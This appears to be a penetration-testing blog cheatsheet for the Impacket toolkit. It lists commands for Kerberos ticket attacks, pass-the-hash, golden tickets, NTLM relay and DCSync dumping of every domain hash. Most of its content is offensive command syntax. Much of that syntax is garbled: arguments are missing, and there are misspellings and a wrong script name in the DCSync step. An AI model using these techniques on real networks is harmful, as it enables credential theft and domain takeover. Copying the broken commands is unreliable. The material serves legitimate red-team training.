Collaborated on by Ashley Knowles & Eric Harashevsky || Reviewed by: Matthew Eidelberg
This blog is part of Offensive Tooling Cheatsheets: An Infosec Survival Guide Resource. You can learn more and find all of the cheatsheets HERE: https://www.blackhillsinfosec.com/offensive-tooling-cheatsheets/
Impacket Cheatsheet: PRINT-FRIENDLY PDF
Find the tool here: https://github.com/fortra/impacket
Impacket is an extremely useful tool for post exploitation. It is a collection of Python scripts that provides low-level programmatic access to the packets and for some protocols, such as DCOM, Kerberos, SMB1, and MSRPC, the protocol implementation itself.
Threat actors use a socks proxy, which forwards network traffic from the client to the destination server, to run the tool which adds an additional layer of stealth.
Typically, Impacket is installed by default in Kali. To install on Windows or other Linux operating systems, it is recommended to use pip or docker.
Pip Installation:
python3 -m pipx install impacketDocker Installation:
docker build -t "impacket:latest" . docker run -it --rm "impacket:latest"This author always recommends utilizing Python virtual environments with pip installations, as sometimes things can get wonky when installing multiple tools.
Python Virtual Environment Creation:
python3 -m venv Activate Virtual Environment:
source /bin/activate Scripts and Example Usage
You’ll find the various scripts, attack techniques, and example invocations discussed at a very high level.
ASREP-Roast
GetNPUsers.py
Retrieves kerberoast tickets for users that do not require pre-authentication. The specific attack is called AS-REP Roast.
Check ASREP-Roast for all domain users:
python GetNPUsers.py /: -request -format - outputfile Check ASREP-Roast for a list of users:
Python GetNPUsers.py / -usersfiles -format - outputfile Kerberoasting
GetUserSPNs.py
Conducts kerberoasting, where service principal names are queried and extracted along with their NTLM hashes.
Python GetUserSPNs.py /: -outputfile Overpass The Hash / Pass The Key (PTK)
Request the TGT with hash:
Python getTGT.py / -hashes [lm_hash]: Request the TGT with password:
Python getTGT.py /: Set the TGT for Impacket use:
Export KRB5CCNAME=Execute remote commands with any of the following using the TGT. The following command can be used with psexec.py, smbexec.py, or wmiexec.py.
python psexec.py /@ -k -no-pass Silver / Golden Ticket Usage
To generate the TGS with NTLM:
Python ticketer.py -nthash -domain-sid -domain -spn To generate the TGT with NTLM:
Python ticketer.py -nthash -domain-sid -domain Set the ticket for Impacket use:
Export KRB5CCNMAE=Execute remote commands with any of the following using the TGT. The following command can be used with psexec.py, smbexec.py, or wmiexec.py:
python psexec.py /@ -k -no-pass NTLMRelay from Responder to Targets
NTLMRelayx is used to relay intercepted or coerced credentials to a target. It is often used in conjunction with Responder, PetitPotam, or MiTM6.
Turn off SMB server in Responder by editing the responder.config file.
Make a list of targets with NetExec that have SMB Signing disabled.
nxc smb --gen-relay-list Ensure ntlmrelayx.py has been started prior to Responder.
Python ntlmrelayx.py -wh -tf -socks -smb2support Start Responder.
After successful authentication, type “socks” to get SOCKS connections retrieved by ntlmrelayx.
secretsdump.py
Performs a DCsync attack on the Domain Controller and dumps all user and machine hashes within the domain. Requires a user with DCsync permissions or Domain Admin.
DCsync via password:
Psxec.py /:''@ > DCsync via pass-the-hash:
Secretsdump.py /@ -hashes : > 
Explore the Infosec Survival Guide and more… for FREE!
Get instant access to all issues of the Infosec Survival Guide, as well as content like our self-published infosec zine, PROMPT#, and exclusive Darknet Diaries comics—all available at no cost.
You can check out all current and upcoming issues here: https://www.blackhillsinfosec.com/prompt-zine/
